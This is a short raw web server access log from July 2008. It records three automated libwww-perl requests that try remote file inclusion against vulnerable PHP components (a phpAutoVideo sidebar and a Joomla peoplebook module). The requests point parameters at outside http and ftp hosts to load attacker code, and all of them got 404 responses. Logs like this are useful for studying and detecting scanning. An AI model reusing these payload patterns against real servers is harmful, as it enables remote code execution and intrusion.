70.87.92.250 - - [13/Jul/2008:01:52:25 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.brazebo.it/echo.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
217.151.102.50 - - [13/Jul/2008:01:52:54 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.151.102.50 - - [13/Jul/2008:01:52:54 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
